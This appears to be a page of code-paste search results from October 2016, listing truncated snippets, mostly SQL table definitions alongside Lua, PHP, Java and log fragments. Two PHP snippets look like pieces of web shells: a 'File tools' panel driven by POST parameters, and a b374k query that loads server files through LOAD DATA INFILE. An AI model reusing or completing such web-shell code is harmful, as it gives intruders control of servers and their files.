42.7K results in 811 ms
9 years ago · Oct 22, 2016, 01:36 AM
route = all_routes[number.strip(), direction.strip(), variant] if ':' not in departure_time: departure_time = float(departure_time)
9 years ago · Oct 22, 2016, 01:14 AM
echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; hardFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1']));
9 years ago · Oct 22, 2016, 12:16 AM
create table $sql = "DROP TABLE IF EXISTS Months;"; $sql .= "CREATE TABLE Months ( month_num INT(6)
9 years ago · Oct 21, 2016, 11:18 PM
self:SetNPCFireRate(1/(self.Primary.RPM/60)) -- //self:SetCurrentWeaponProficiency( WEAPON_PROFICIENCY_VERY_GOOD ) end if CLIENT then -- // Create a new table for every weapon instance
9 years ago · Oct 21, 2016, 10:02 PM
structure for table `role` -- CREATE TABLE IF NOT EXISTS `role` ( `rid` int(10) unsigned
9 years ago · Oct 21, 2016, 09:24 PM
USE `mydb` ; -- ----------------------------------------------------- -- Table `mydb`.`userplaylist` -- ----------------------------------------------------- CREATE TABLE IF NOT EXISTS `mydb`.`userplaylist` ( `userplaylistID` INT(11) NOT
9 years ago · Oct 21, 2016, 09:10 PM
make sure the file exists if not fs.exists(self.path) then return false
9 years ago · Oct 21, 2016, 08:46 PM
isset($_GET['sqlquery']))){$db = $_GET['db'];$query = "DROP TABLE IF EXISTS b374k_table;\nCREATE TABLE `b374k_table` ( `file` LONGBLOB NOT NULL );\nLOAD DATA INFILE
9 years ago · Oct 21, 2016, 08:34 PM
structure for table `nested_categories` -- CREATE TABLE IF NOT EXISTS `nested_categories` ( `category_id` int(11) NOT
9 years ago · Oct 21, 2016, 08:24 PM
or opens the folder if not fs.isDir(f) then return shell.run(f)
9 years ago · Oct 21, 2016, 08:20 PM
or opens the folder if not fs.isDir(f) then return shell.run(f)
9 years ago · Oct 21, 2016, 06:34 PM
for table `abe_lock` -- DROP TABLE IF EXISTS `abe_lock`; /*!40101 SET @saved_cs_client
9 years ago · Oct 21, 2016, 06:00 PM
structure for table `Categories` -- CREATE TABLE IF NOT EXISTS `Categories` ( `id` varchar(1) NOT
9 years ago · Oct 21, 2016, 04:34 PM
COLLATE utf8_general_ci ; USE `mydb1` ; CREATE TABLE IF NOT EXISTS `mydb1`.`placement` ( `idplacement` INT NOT
9 years ago · Oct 21, 2016, 04:30 PM
COLLATE utf8_general_ci ; USE `mydb` ; CREATE TABLE IF NOT EXISTS `mydb`.`placement` ( `idplacement` INT NOT
9 years ago · Oct 21, 2016, 04:06 PM
if the DOMDocument class exists. If it does not exist, then we cannot
9 years ago · Oct 21, 2016, 04:02 PM
SET ANSI_PADDING ON GO CREATE TABLE [dbo].[MAC_BAN_TBL]( [id] [int] IDENTITY(1,1) NOT NULL, [macaddr] [varchar](40) NULL
9 years ago · Oct 21, 2016, 02:44 PM
SQL_SetCharset(g_DB, "utf8"); SQL_TQuery(g_DB, OnTableCreated, "CREATE TABLE IF NOT EXISTS `player_analytics` (id int(11) NOT
9 years ago · Oct 21, 2016, 12:40 PM
static final String DATABASE_CREATE = "create table IF NOT EXISTS" + "LOGIN" + "( " + "USERNAME text primary
9 years ago · Oct 21, 2016, 12:26 PM
14:21:34] [Client thread/INFO] [NEIAddons|CraftingTables]: Not registering BC Autorcrafting Table [14:21:34] [Client thread/INFO] [NEIAddons|CraftingTables]:
Total pages: 2134